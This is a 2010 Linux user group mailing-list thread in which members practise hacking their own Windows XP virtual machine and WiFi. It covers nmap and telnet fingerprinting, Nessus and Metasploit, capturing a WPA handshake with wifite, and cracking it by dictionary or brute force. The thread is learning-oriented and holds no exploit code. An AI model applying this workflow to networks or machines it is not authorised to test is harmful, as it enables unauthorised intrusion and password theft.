[Gloucs] Virtual hacking

Matthew Phillips phillips321 at gmail.com
Sat Oct 23 12:38:49 UTC 2010 

.cap files are captures of network traffic. They can be opened in wireshark
(formerly ethereal).

Capturing a wpa handshake just captures the handshake. The password is still
not in clear text.

To crack wpa you'll need to perform a dictionary attack against the captured
handshake. (a sample dictionary file can be downloaded here:
http://phillips321.co.uk/apps/ wpa.txt)

To prove it works add your wpa password into the file somewhere(preferably
not at the very beginning, or at the very end) and then run it.

WPA bruteforcing takes alot longer, basically attempts will be made like
follows:


aaaaa,
aaaab,
aaaac,
.........
zzzzz
Aaaaa,
Aaaab
Aaaac
........ and so on. VERY time consuming. People who have access to a
powerful cluster have created websites where you upload the pcap file to
them: http://www.wpacracker.com/ usually expensive though!

Have fun

P.s. check man arp-scan   it'll tell you the flag to tell it which interface
to use, i think it's -I or -i ????
On 23 October 2010 11:26, Will Rendell <b19wll at gmail.com> wrote:

> Matt
>
> I have just played with wifite and it captured my handshake, on opening the
> xxxxx.cap file with nano it was not clear where my paraphrase was. It was
> just pages and pages of random strings of text. Should I be opening the cap
> file with another app?
>
> I have loaded gnacktrack on my little acer aspire one, when I run arp-scan
> -l it won't run as it can't find an ip on eth0, as I am using wlan0 what do
> I need to change to get it running with my WiFi
>
> Thanks
>
> Will
> On 22 Oct 2010 14:41, "matt robbins" <mrrobbins1 at live.co.uk> wrote:
> >
> > Hi Matt,
> >
> > Actually scrap the part I put regarding the Ubuntu install, I looked it
> up
> and I need to somehow obtain Ubuntu Netbook.
> >
> > I have Metaspoit installed on my windows xp os but when i run the
> metasploit console it seems to take an age to "configure user permissions
> for first run" any idea why?
> >
> > Regards,
> >
> > Matt R
> >
> >
> >> From: mrrobbins1 at live.co.uk
> >> To: gloucs at mailman.lug.org.uk
> >> Date: Fri, 22 Oct 2010 10:54:15 +0100
> >> Subject: Re: [Gloucs] Virtual hacking
> >>
> >>
> >> Hi Matt,
> >>
> >> Thanks for that, its really useful!
> >>
> >> I'm about to download and install nessus and also run that get html
> command on my http port.
> >>
> >> Only thing is I can't download the GnackTrack even though i would love
> to
> because I only have a limited download size left this month.
> >>
> >> I installed ubuntu using Virtual Box, the iso i actually downloaded for
> ubuntu was: Ubuntu 10.10-alternate-i386.iso. I actually tried installing it
> directly from usb stick (after I used PE Builder to "attempt" to build a
> bootable copy onto the usb stick) but it has a problem with the CD Drivers
> in part of the installation process. I am using a Samsung Notebook so I do
> not have a cd player.
> >> Is there an easier way to install it as I have a spare partition of
> atleast 20gigs ready and waiting for when i manage to install it.
> >>
> >> Regards,
> >>
> >> Matt R
> >>
> >> > Date: Thu, 21 Oct 2010 17:42:58 +0100
> >> > From: phillips321 at gmail.com
> >> > To: gloucs at mailman.lug.org.uk
> >> > Subject: Re: [Gloucs] Virtual hacking
> >> >
> >> > Hi Matt,
> >> >
> >> > First of all using a telnet client is a good way to fingerprint a
> service
> >> > such as the 3 you have found, but an even better way to automate the
> finger
> >> > printing would be to use the nmap -A flag or simply use amap as thats
> a
> >> > purpose build fingerprinting tool.
> >> >
> >> > The main issue is that each service will have different ways of
> >> > communicating.
> >> >
> >> > For example to communicate with a HTTP service try the following:
> >> >
> >> > GET / HTTP/1.1[enter]
> >> > [enter]
> >> > [enter]
> >> >
> >> > (make sure you press enter twice as it looks for a two next line
> characters)
> >> >
> >> > Your best bet for now would be to download and install nessus. It's a
> >> > vulnerability exploitation tool. If you download GnackTrack it already
> comes
> >> > bundled, you'll just have to registyer for a free home feed to get the
> >> > plugins (http://www.nessus.org/plugins/?view=homefeed)
> >> >
> >> > Then run nessus against your windows XP target.
> >> > A demo of nmap, nessus and then metasploit to control the target is
> here:
> >> > http://www.youtube.com/watch?v=Bpafg8WQSqk (i recorded this before
> the
> last
> >> > LUG talk in case something went wrong on the night. - watch in 720p to
> see
> >> > the text)
> >> >
> >> > If you want to target web applications directly it's worth downloading
> >> > wackopicko which is a vulnerable web application(it will be your
> target), a
> >> > vmware and livecd copy can be found on the gnacktrack website.
> >> >
> >> > Hope this helps
> >> >
> >> > Matt
> >> >
> >> > P.s. All of the apps mentioned above are preinstalled in GnackTrack,
> sorry
> >> > for the shameful plug ;-)
> >> >
> >> > On 21 October 2010 17:30, matt robbins <mrrobbins1 at live.co.uk> wrote:
> >> >
> >> > >
> >> > > Hi Guys,
> >> > >
> >> > > I've been attempting "hacking" into my windows xp os using my
> "virtual"
> >> > > linux ubuntu package.
> >> > > when I scanned with nmap it gave me 3 open ports, 139, 135 and 2869
> >> > > I then used Telnet to connect to the following ports and got these
> results;
> >> > >
> >> > > port 135 hangs when i try to connect to it
> >> > > port 139 disconnects me
> >> > > port
> >> > > 2869 is http but i have not a clue what commands to use and how i
> >> > > should use them, I tried regular html etc but that did not work, it
> just
> >> > > disconnected me back to the linux ubuntu terminal program.
> >> > >
> >> > > Any
> >> > > help would be appreciated as i am trying to learn more about
> security. I
> >> > > thought the best bet would be to go on the "offensive" and learn to
> >> > > hack succesfully against myself for a while using different methods,
> >> > > then eventually I could go on the defensive and learn about
> preventative
> >> > > measures and test them against myself etc.
> >> > >
> >> > > Regards,
> >> > >
> >> > > Matt R
> >> > > _______________________________________________
> >> > > gloucs mailing list
> >> > > gloucs at mailman.lug.org.uk
> >> > > https://mailman.lug.org.uk/mailman/listinfo/gloucs
> >> > >
> >> > _______________________________________________
> >> > gloucs mailing list
> >> > gloucs at mailman.lug.org.uk
> >> > https://mailman.lug.org.uk/mailman/listinfo/gloucs
> >>
> >> _______________________________________________
> >> gloucs mailing list
> >> gloucs at mailman.lug.org.uk
> >> https://mailman.lug.org.uk/mailman/listinfo/gloucs
> >
> > _______________________________________________
> > gloucs mailing list
> > gloucs at mailman.lug.org.uk
> > https://mailman.lug.org.uk/mailman/listinfo/gloucs
> _______________________________________________
> gloucs mailing list
> gloucs at mailman.lug.org.uk
> https://mailman.lug.org.uk/mailman/listinfo/gloucs
>

More information about the gloucs mailing list